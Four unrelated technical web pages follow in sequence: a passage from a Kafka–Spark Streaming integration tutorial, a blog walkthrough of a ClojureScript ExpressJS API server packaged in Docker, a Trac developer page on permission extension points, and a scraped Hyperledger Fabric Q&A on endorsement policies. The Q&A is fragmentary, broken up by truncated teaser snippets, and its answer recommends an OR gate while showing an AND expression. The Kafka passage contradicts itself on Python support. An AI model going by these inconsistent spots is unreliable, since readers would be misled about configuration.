Further, we will discuss how to use this receiver-based approach in our Kafka Spark Streaming application.

i. Linking

For Scala/Java applications using SBT/Maven project definitions, link your Kafka streaming application with the following artifact:

groupId = org.apache.spark
artifactId = spark-streaming-kafka-0-8_2.11
version = 2.2.0

For Python applications, we will have to add this library and its dependencies when deploying our application.

ii. Programming

Afterward, create an input DStream by importing KafkaUtils in the streaming application code:

import org.apache.spark.streaming.kafka._

val kafkaStream = KafkaUtils.createStream(streamingContext,
  [ZK quorum], [consumer group id], [per-topic number of Kafka partitions to consume])

Also, using variations of createStream, we can specify the key and value classes and their corresponding decoder classes.

iii. Deploying

As with any Spark application, spark-submit is used to launch your application. However, the details are slightly different for Scala/Java applications and Python applications.

For Python applications, which lack SBT/Maven project management, spark-streaming-kafka-0-8_2.11 and its dependencies can be added directly to spark-submit with --packages:

./bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.2.0 ...

Alternatively, we can download the JAR of the Maven artifact spark-streaming-kafka-0-8-assembly from the Maven repository and add it to spark-submit with --jars.
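The write-ahead log mentioned above is not enabled by default. A minimal sketch of turning it on follows; the application name and checkpoint path are made-up placeholders, while the configuration key comes from Spark's documentation (the write-ahead log needs a checkpoint directory to write to):

import org.apache.spark.SparkConf
import org.apache.spark.streaming.{Seconds, StreamingContext}

val conf = new SparkConf()
  .setAppName("kafka-receiver-app")
  // persist received blocks to a write-ahead log for zero data loss
  .set("spark.streaming.receiver.writeAheadLog.enable", "true")

val streamingContext = new StreamingContext(conf, Seconds(10))

// the WAL is written under the checkpoint directory (placeholder path)
streamingContext.checkpoint("hdfs:///checkpoints/kafka-receiver-app")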
b. Direct Approach (No Receivers)

After the receiver-based approach, a new receiver-less "direct" approach was introduced, which ensures stronger end-to-end guarantees. Instead of using receivers to receive data, this approach periodically queries Kafka for the latest offsets in each topic and partition, and accordingly defines the offset ranges to process in each batch. When the jobs to process the data are launched, Kafka's simple consumer API is used to read the defined ranges of offsets from Kafka, similar to reading files from a file system.

Note: This feature was introduced in Spark 1.3 for the Scala and Java API, and in Spark 1.4 for the Python API.

Now, let's discuss how to use this approach in our streaming application.

i. Linking

This approach is supported only in Scala/Java applications. Link the SBT/Maven project with the following artifact:

groupId = org.apache.spark
artifactId = spark-streaming-kafka-0-8_2.11
version = 2.2.0

ii. Programming

Further, import KafkaUtils and create an input DStream in the streaming application code:

import org.apache.spark.streaming.kafka._

val directKafkaStream = KafkaUtils.createDirectStream[
  [key class], [value class], [key decoder class], [value decoder class] ](
  streamingContext, [map of Kafka parameters], [set of topics to consume])

We must specify either metadata.broker.list or bootstrap.servers in the Kafka parameters. By default, the stream will start consuming from the latest offset of each Kafka partition; if you set the configuration auto.offset.reset in the Kafka parameters to smallest, it will start consuming from the smallest offset instead. Moreover, using other variations of KafkaUtils.createDirectStream, we can start consuming from an arbitrary offset.

Afterward, do the following to access the Kafka offsets consumed in each batch:

// Hold a reference to the current offset ranges, so downstream can use it
var offsetRanges = Array.empty[OffsetRange]

directKafkaStream.transform { rdd =>
  offsetRanges = rdd.asInstanceOf[HasOffsetRanges].offsetRanges
  rdd
}.map {
  ...
}.foreachRDD { rdd =>
  for (o <- offsetRanges) {
    println(s"${o.topic} ${o.partition} ${o.fromOffset} ${o.untilOffset}")
  }
  ...
}

If we want Zookeeper-based Kafka monitoring tools to show the progress of the streaming application, we can use this to update Zookeeper ourselves.

iii. Deploying

Here, the deploying process is similar to that of the receiver-based approach.

3. Advantages of the Direct Approach

The second approach has the following advantages over the first in Spark Streaming integration with Kafka:

a. Simplified Parallelism

There is no requirement to create multiple input Kafka streams and union them. With the direct stream, Spark Streaming will create as many RDD partitions as there are Kafka partitions to consume, all reading data from Kafka in parallel. Hence, there is a one-to-one mapping between Kafka and RDD partitions, which is easier to understand and tune.

b. Efficiency

Achieving zero data loss in the first approach required the data to be stored in a write-ahead log, which replicated the data a second time: once by Kafka itself, and a second time by the write-ahead log. The second approach eliminates the problem, as there is no receiver and hence no need for write-ahead logs. As long as we have sufficient Kafka retention, it is possible to recover messages from Kafka.

c. Exactly-Once Semantics

In the first approach, we used Kafka's high-level API to store consumed offsets in Zookeeper, which is the traditional way to consume data from Kafka. Even though it can ensure zero data loss, there is a small chance some records get consumed twice under some failures, due to inconsistencies between the data reliably received by Spark Streaming and the offsets tracked by Zookeeper. Therefore, in this second approach, we use a simple Kafka API that does not use Zookeeper, and offsets are tracked by Spark Streaming within its checkpoints. Thus each record is received by Spark Streaming effectively exactly once despite failures.
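We noted above that other variations of KafkaUtils.createDirectStream let the stream start from arbitrary offsets. Here is a hedged sketch of that variant for the 0-8 integration; the topic name, partition, and offset value are made-up placeholders, and streamingContext and kafkaParams are assumed to be defined as in the snippets above:

import kafka.common.TopicAndPartition
import kafka.message.MessageAndMetadata
import kafka.serializer.StringDecoder
import org.apache.spark.streaming.kafka.KafkaUtils

// start topic "mytopic", partition 0 at offset 1234 (placeholder values)
val fromOffsets = Map(TopicAndPartition("mytopic", 0) -> 1234L)

val stream = KafkaUtils.createDirectStream[
  String, String, StringDecoder, StringDecoder, (String, String)](
  streamingContext, kafkaParams, fromOffsets,
  (mmd: MessageAndMetadata[String, String]) => (mmd.key, mmd.message))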
To achieve exactly-once semantics for the output of our results, make sure the output operation that saves the data to an external data store is either idempotent, or an atomic transaction that saves results and offsets together.

One disadvantage remains: because this approach does not update offsets in Zookeeper, Zookeeper-based Kafka monitoring tools will not show progress. But still, we can access the offsets processed by this approach in each batch and update Zookeeper ourselves.

So, this was all about Apache Kafka–Spark Streaming integration. Hope you like our explanation.

4. Conclusion

Hence, in this article we have covered the whole concept of Spark Streaming integration with Apache Kafka in detail. We discussed two different approaches to Kafka Spark Streaming configuration, the receiver-based approach and the direct approach, and the advantages of the direct approach. Furthermore, if any doubt occurs, feel free to ask in the comment section.

See also: Kafka Cluster.

A reader comment asks: if I run a createStream job for one topic with 3 partitions on 6 executors, each executor having 2 cores, how many receivers will be used, and on how many executors? I thought 3 receivers would run on 3 executors, each using one CPU, with the remaining CPU on each used to process tasks, and that the additional 3 executors (2 CPUs each) wouldn't be used until we repartition the RDDs to process the data.
https://data-flair.training/blogs/kafka-spark-streaming-integration/
CC-MAIN-2019-47
en
refinedweb
A ClojureScript API Server in Docker using ExpressJS

So you know what to expect, I'm going to talk about the ClojureScript project file, then the Javascript package file (needed for native Javascript packages), then the code itself, and finally the Dockerfile to build the Docker image.

Clojure and ClojureScript

If you haven't encountered it before, Clojure is a Lisp dialect which runs on a JVM and interoperates with Java. As a Lisp dialect, Clojure is a functional programming language, dynamic in nature, has a code as data philosophy, and encourages immutability.

ClojureScript is a compiler for Clojure, which generates Javascript. This gives two complementary directions on its use. Firstly, it gives another language which can be used in the browser (addressing concerns some people have around Javascript). Secondly, if you are already writing code in Clojure on your server, this gives a way of running some of that code in the browser (e.g. to do validation).

The Challenge

What I wanted to do was to generate server-side Javascript from ClojureScript, allowing me to continue to use Clojure as a language, but to overcome some of the challenges around Java-based microservices. Before I looked at ClojureScript, I assumed this would be a trivial matter: just write Clojure as I had been, but compile it in a different way. The fact that I am writing this blog hints at the fact that it was not so simple.

The primary challenge is that although Clojure itself can be pretty much consumed by the ClojureScript compiler, some features rely on Java, some libraries are not ClojureScript-compatible, and sometimes I use Java libraries or other JVM-based DSLs (such as Drools). This meant that I could not just use my standard stack, I needed to look for some replacements.

The General Approach

I immediately found that huge chunks of my stack weren't compatible; this included the Ring libraries I use for actually creating a web server, and the Liberator library I use for routing and validating API calls. I decided to use ExpressJS as the obvious choice to replace these (although I may look into Loopback in the future). Fortunately, my logging library of choice, Timbre, is ClojureScript-ready, so I could continue to use that. Since this is a simple proof of concept (I'm just going to serve some canned responses), that's all I need.

The project.clj File

I use Leiningen to build my Clojure projects, so I need to create a project.clj file to handle everything. This begins with some standard items (including the project name, which is map-server, because of where I want to eventually go with this):

(defproject map-server "0.1.0-SNAPSHOT"
  :description "ExpressJS in ClojureScript proof of concept"
  :url ""
  :license {:name "Eclipse Public License"
            :url ""}

Next we have the dependencies. I tend to group these into areas, and comment the area:

  :dependencies [; Core Clojure
                 [org.clojure/clojure "1.8.0"]
                 [org.clojure/clojurescript "1.9.946"]

                 ; Logging
                 [com.taoensso/timbre "4.10.0"]]

Next we have any plugins. The important one for us is the plugin to actually build ClojureScript (usually abbreviated to cljs):

  :plugins [[lein-cljsbuild "1.1.7"]]

Finally, we have the information needed to build the Javascript from the ClojureScript.
This includes items such as where to find the source files, where to write the output files, and where to find the overall main function:

  :cljsbuild {
    :builds [{:source-paths ["src/cljs"]
              :compiler {:output-to "resources/public/core.js"
                         :optimizations :advanced
                         :externs ["node_modules/body-parser/index.js"
                                   "node_modules/express/lib/middleware/init.js"
                                   "node_modules/express/lib/middleware/query.js"
                                   "node_modules/express/lib/router/index.js"
                                   "node_modules/express/lib/router/layer.js"
                                   "node_modules/express/lib/router/route.js"
                                   "node_modules/express/lib/application.js"
                                   "node_modules/express/lib/express.js"
                                   "node_modules/express/lib/request.js"
                                   "node_modules/express/lib/response.js"
                                   "node_modules/express/lib/utils.js"
                                   "node_modules/express/lib/view.js"
                                   "externs/externs.js"]
                         :target :nodejs
                         :main "map-server.core"}}]})

Two key items to note are the optimizations and the externs. I've opted to turn on full optimisation here, which uses Google's Closure. This can sometimes cause problems if you are using pure Javascript libraries which are not Closure-ready (in which case you can set it to none if you wish).

The second item is the externs list. Because I will be using ExpressJS as a standard Javascript library, and because it is not Closure-ready, I need to specify where to find all the various entrypoints to functions in it.

The package.json File

I will be using ExpressJS, which is a pure Javascript library. ClojureScript will therefore not know how to import it, so I will use npm for that. I will therefore create a package.json file to make that easier to do. This is a very simple file, basically just listing ExpressJS as a dependency:

{
  "name": "map-server",
  "version": "0.0.1",
  "description": "ExpressJS / ClojureScript proof of concept",
  "main": "app.js",
  "directories": {
    "doc": "doc",
    "test": "test"
  },
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "Ian Finch",
  "license": "EPL",
  "dependencies": {
    "express": "^4.16.1"
  }
}

Now I just need to run npm install and I get ExpressJS and its dependencies in the location I already specified in my project.clj.

The Source Code

Clojure can be very specific about where files go, so I tend to use the same directory structure that Leiningen's scaffolding sets up. I therefore put my core ClojureScript for my map-server namespace at src/cljs/map-server/core.cljs.

I begin with a namespace declaration, together with require statements for any libraries I will be using:

(ns map-server.core
  (:require [cljs.nodejs :as node]
            [taoensso.timbre :as log]))

Next, I do the equivalent of NodeJS's require, to make the ExpressJS module available:

(def express (node/require "express"))

Now I write a simple request handler for any API calls. Because I am using ExpressJS, these will be in the format expected by ExpressJS: a function which accepts a request and a response object, and which returns a modified response object:

(defn handler
  "Function to handle a simple request"
  [req res]
  (log/info "Request:" (.-method req) (.-url req))
  (-> res
      (.status 200)
      (.json (clj->js {:message "Hello ClojureScript"}))))

Just like in standard Clojure, a function name beginning with a dot invokes a method call on the object given as the first parameter. Obviously, the difference here is that this is a Javascript object rather than a Java object. ClojureScript extends this notation, so that if the character after the dot is a dash, it retrieves the value with that name from the object. So, in the above function, the expression (.-url req) gets the contents of the variable url from the object req (in Javascript this would be req.url).

The thread function makes the function calls less obvious, but if I unthread it, the expression (.status res 200) invokes the status method on the res object with the value 200 (or res.status(200) in Javascript).
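Since the threading macro hides the nesting, it may help to see what the threaded body of handler expands to. This is just the macro expansion written out by hand, not code from the project itself:

;; the threaded form...
(-> res
    (.status 200)
    (.json (clj->js {:message "Hello ClojureScript"})))

;; ...expands to nested method calls:
(.json (.status res 200)
       (clj->js {:message "Hello ClojureScript"}))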
Finally, because we want to return a JSON structure, we use the handy clj->js function to convert our ClojureScript map into a Javascript object, then call the response's json function to set that as the body of the response. You can therefore see that the above function simply logs a message describing the request, sets a success status, and supplies a hard-coded message as the body of the response.

It's also convenient to know when our web server has started up, so I also wrote a brief callback which just logs a message:

(defn server-started-callback
  "Callback triggered when ExpressJS server has started"
  []
  (log/info "App started at http://localhost:3000"))

We can now pull all this together in our main function, which creates a new Express instance, adds our handler for when someone requests /, and starts listening on port 3000:

(defn -main
  "Our main handler"
  [& args]
  (doto (new express)
    (.get "/" handler)
    (.listen 3000 server-started-callback)))

So, now I can fire up my server and try a couple of requests. Here is the output:

[docker@minikube:~]$ curl localhost:3000/
{"message":"Hello ClojureScript"}
[docker@minikube:~]$ curl localhost:3000/foo
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /foo</pre>
</body>
</html>

And here is what I see in the console:

INFO [map-server.core:11] - App started at http://localhost:3000
INFO [map-server.core:32] - Request: GET /

Note that the /foo request doesn't show in the logs, since it doesn't reach my handler.

We Need More Idioms

So, that works, but it feels like Javascript written as Clojure. Additionally, if we add a second URI, we will need a new handler for that, which will have to do its own logging, its own JSON conversions, etc. So, let's convert our handler function into a generic one which handles the grunt work, so that our URI-specific handlers only need to add their specific functionality:

(defn handler
  "Function to handle a generic route"
  [handler-fn]
  (fn [req res]
    (log/info "Request:" (.-method req) (.-url req))
    (-> res
        (.status 200)
        (.json (clj->js (handler-fn req res))))))

This is almost identical to the earlier handler, but it now returns a function which does the actual handling of the request, rather than doing it itself. To accomplish this, it takes as a parameter a function which does the request-specific part of handling the request. You can see that passed-in function being called in the last line of the above code.

We can now modify our main function to use the above function in its routing calls:

(defn -main
  "Our main handler"
  [& args]
  (doto (new express)
    (.get "/" (handler (fn [request response] {:message "Hello ClojureScript"})))
    (.get "/xyzzy" (handler (fn [request response] {:result "Nothing happens"})))
    (.listen 3000 server-started-callback)))

We can run this to check it behaves as expected:

[docker@minikube:~]$ curl localhost:3000/
{"message":"Hello ClojureScript"}
[docker@minikube:~]$ curl localhost:3000/xyzzy
{"result":"Nothing happens"}
[docker@minikube:~]$

To make it easier to configure, we can make the routes more flexible by accepting multiple types of argument (strings, objects and functions) and converting them all to functions.
This would allow us to use a more concise syntax:

(defn -main
  "Our main handler"
  [& args]
  (doto (new express)
    (.get "/" (handler "Hello ClojureScript"))
    (.get "/xyzzy" (handler {:result "Nothing happens"}))
    (.get "/echo" (handler (fn [req _] {:method (.-method req)
                                        :url (.-url req)})))
    (.listen 3000 server-started-callback)))

We can do this by adding a function to test the type and convert it to a canonical function format:

(defn canonicalise-fn
  "Create a function, depending on input type"
  [item]
  (cond
    (fn? item)     item
    (string? item) (fn [_ _] {:message item})
    :else          (fn [_ _] item)))

We glue this all together by calling the canonical function from our handler:

(defn handler
  "Function to handle a generic route"
  [handler-fn]
  (let [canonical-fn (canonicalise-fn handler-fn)]
    (fn [req res]
      (log/info "Request:" (.-method req) (.-url req))
      (log/debug "Request:" (obj->clj req))
      (-> res
          (.status 200)
          (.json (clj->js (canonical-fn req res)))))))

So, now we have our server, we just need to stick it in a Docker container.

The Dockerfile

The Dockerfile is really straightforward:

- Our ClojureScript has been compiled into a Javascript file at resources/public/core.js (as defined in our project.clj).
- Our supporting modules (ExpressJS and dependencies) are in node_modules.
- To run our Javascript, we just use the node command followed by the name of our Javascript file.

So, we need a base node image (I'll use the alpine version for a smaller container), we need to copy our files to a suitable directory, and then issue the node command. So our Dockerfile is this:

FROM node:alpine

COPY map-server/resources/public/core.js /usr/src/node/map-server.js
COPY map-server/node_modules /usr/src/node/node_modules

WORKDIR /usr/src/node
CMD node map-server.js

This gives me an 80MB Docker image, which starts up quickly and is available to serve web pages immediately (build and run commands are sketched after the summary below).

Summary

As a proof of concept, this has demonstrated that it is possible to build a containerised API server in ClojureScript, leveraging Javascript modules. My next step will be to look at some more API-specific server modules (such as loopback.io) or some of the ClojureScript libraries which are starting to appear (such as macchiato-framework.github.io).

The code used in this article is available on GitHub at ianfinch/cljs-expressjs
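For completeness, building and running the image might look like the following sketch. The image tag map-server is a made-up name, the build is run from the directory containing the map-server project (since the Dockerfile's COPY paths start with map-server/), and the port mapping follows the (.listen 3000 ...) call above:

docker build -t map-server .
docker run -p 3000:3000 map-server

# then, from another shell
curl localhost:3000/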
https://ian-says.com/articles/clojurescript-expressjs-docker-api-server/
CC-MAIN-2019-47
en
refinedweb
Extension Point : IPermissionRequestor

The (somewhat confusingly named) IPermissionRequestor simply allows components to define permission actions (and meta permission actions and their relations to other permission actions).

Purpose

Many of Trac's features are only available to users with certain permissions. By default these are the coarse permissions described in TracPermissions. More fine-grained per-resource permissions as described by TracFineGrainedPermissions are also possible. While a component can check for any permissions already defined by other components, it might want to define its own permission types for its actions on resources.

Usage

Implementing the interface follows the standard guidelines found in TracDev/ComponentArchitecture and of course TracDev/PluginDevelopment.

Only one method has to be defined: get_permission_actions(). This method should return a list of permission actions. Each action is either the name of the action (a simple string) or, for so-called meta permissions, a tuple, where the first tuple item is the name of the action, and the second tuple item is a list of subsumed action names. (The meta permission covers all listed permissions. If multiple implementations return the same meta permission, they are combined.)

Action names should be in ALL_CAPS_WITH_UNDERSCORES and usually consist of two parts:

- The resource type / module name.
- The action to perform on that resource.

The most common action is VIEW, to allow basic usage (viewing) of a resource. It is often required for components implementing IRequestHandler, where process_request() would check for permissions categorically (req.perm.require('RESOURCE_VIEW')) or selectively (if 'RESOURCE_ACTION' in req.perm:). (Such an IRequestHandler - or any other kind of checked resource access - could also be implemented by any other Component.)

Anyone with access to a perm (trac.perm.PermissionCache) can perform permission checks. It is usually obtained from req (a trac.web.api.Request). More fine-grained per-resource permission checks can be performed by obtaining a specialized cache using req.perm(resource) or req.perm(realm, resource_id).

A slightly more complex pattern is to return multiple simple RESOURCE_ACTION permission actions and one RESOURCE_ADMIN meta permission action covering the others. Even more complex hierarchies of permissions are possible. (See #Ticket)

Examples

Minimal

A minimal IPermissionRequestor in isolation is not very useful (but possible) and is usually accompanied by implementations of other interfaces that require these permissions. Hence the following example is best understood in the context of the ComponentModuleExamples.

In Trac, components have no associated permissions. The following example defines two new permissions to be checked elsewhere:

from trac.core import Component, implements
from trac.perm import IPermissionRequestor

class ComponentModule(Component):
    implements(IPermissionRequestor)

    def get_permission_actions(self):
        return ['COMPONENT_LIST', 'COMPONENT_VIEW']

Upgrade example

If a new version of a component renames / merges / splits existing permissions of an older version, it might want to implement an environment upgrade (IEnvironmentSetupParticipant). A real example would be TracPastePlugin, which changed from a single permission PASTEBIN_USE to multiple permissions PASTEBIN_VIEW and PASTEBIN_CREATE. In the changeset making that change, environment_needs_upgrade checks _has_old_permission for any of the old permissions, and upgrade_environment calls convert_use_permissions (via the version_map if required) to convert them to the new permissions.
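The changeset itself is not reproduced here, but the pattern it describes looks roughly like the following sketch. The interface methods come from IEnvironmentSetupParticipant and the helper names from the description above; the helper bodies and the direct queries against the permission table are assumptions for illustration only:

from trac.core import Component, implements
from trac.env import IEnvironmentSetupParticipant

OLD_PERMISSION = 'PASTEBIN_USE'
NEW_PERMISSIONS = ['PASTEBIN_VIEW', 'PASTEBIN_CREATE']

class PastebinPermissionUpgrader(Component):
    implements(IEnvironmentSetupParticipant)

    def environment_created(self):
        pass

    def environment_needs_upgrade(self, db):
        # upgrade if any subject still holds the old permission
        return self._has_old_permission(db)

    def upgrade_environment(self, db):
        self.convert_use_permissions(db)

    def _has_old_permission(self, db):
        cursor = db.cursor()
        cursor.execute("SELECT COUNT(*) FROM permission WHERE action=%s",
                       (OLD_PERMISSION,))
        return cursor.fetchone()[0] > 0

    def convert_use_permissions(self, db):
        cursor = db.cursor()
        cursor.execute("SELECT username FROM permission WHERE action=%s",
                       (OLD_PERMISSION,))
        users = [row[0] for row in cursor.fetchall()]
        for user in users:
            # grant the new, finer-grained permissions...
            for action in NEW_PERMISSIONS:
                cursor.execute("INSERT INTO permission (username, action) "
                               "VALUES (%s, %s)", (user, action))
        # ...and retire the old one
        cursor.execute("DELETE FROM permission WHERE action=%s",
                       (OLD_PERMISSION,))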
Available Implementations

Simple

One of the simplest use cases is to define one permission to view the resources of that module:

- trac.timeline.web_ui.TimelineModule

    return ['TIMELINE_VIEW']

- trac.search.web_ui.SearchModule

    return ['SEARCH_VIEW']

- trac.about.AboutModule

    return ['CONFIG_VIEW']

Ticket

The most complex example in Trac itself. Various meta permissions subsume certain / all other permissions for convenience.

- trac.ticket.api.TicketSystem

    return ['TICKET_APPEND', 'TICKET_CREATE', 'TICKET_CHGPROP', 'TICKET_VIEW',
            'TICKET_EDIT_CC', 'TICKET_EDIT_DESCRIPTION', 'TICKET_EDIT_COMMENT',
            ('TICKET_MODIFY', ['TICKET_APPEND', 'TICKET_CHGPROP']),
            ('TICKET_ADMIN', ['TICKET_CREATE', 'TICKET_MODIFY', 'TICKET_VIEW',
                              'TICKET_EDIT_CC', 'TICKET_EDIT_DESCRIPTION',
                              'TICKET_EDIT_COMMENT'])]

- trac.ticket.report.ReportModule

    actions = ['REPORT_CREATE', 'REPORT_DELETE', 'REPORT_MODIFY',
               'REPORT_SQL_VIEW', 'REPORT_VIEW']
    return actions + [('REPORT_ADMIN', actions)]
https://trac.edgewall.org/wiki/TracDev/PluginDevelopment/ExtensionPoints/trac.perm.IPermissionRequestor
CC-MAIN-2019-47
en
refinedweb
11627/how-to-configure-endorsement-policy-in(..) Example: "AND('Org1.member', 'Org2.member')" When you execute peer instantiate chaincodeName you have to pass -P policyString where policyString is the expression shown as in the above example Ex: peer chaincode instantiate -C testchainid -n mycc -p github.com/hyperledger/fabric/examples/chaincode/go/chaincode_example02 -c '{"Args":["init","a","100","b","200"]}' -P "AND('Org1.member', 'Org2.member')" What the logic -P "AND('Org1.member', 'Org2.member')" in your code mean? You can use the OR gate for this. Refer the below logic. -P "AND('Org1.member', 'Org2.member')" You can also use nested logic. Suppose you want to request one signature from a member of the Org1 MSP or 1 signature from a member of the Org2 MSP and 1 signature from a member of the Org3 MSP. Then you can use the following logic: OR('Org1.member', AND('Org2.member', 'Org3.member')) Endorsement policy can be set by using the -P switch. When instantiating the chaincode, use the -P switch following by a Boolean logic representing which peer or organization has to sign the transaction. $ peer chaincode instantiate <other parameters> -P <boolean logic> Give the proposal responses you are receiving ...READ MORE I know it is a bit late ...READ MORE The peers communicate among them through the ...READ MORE Summary: Both should provide similar reliability of ...READ MORE To read and add data you can ...READ MORE This will solve your problem import org.apache.commons.codec.binary.Hex; Transaction txn ...READ MORE To do this, you need to represent ...READ MORE I think the docker-compose tool is not ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/11627/how-to-configure-endorsement-policy-in-hyperledger
CC-MAIN-2019-47
en
refinedweb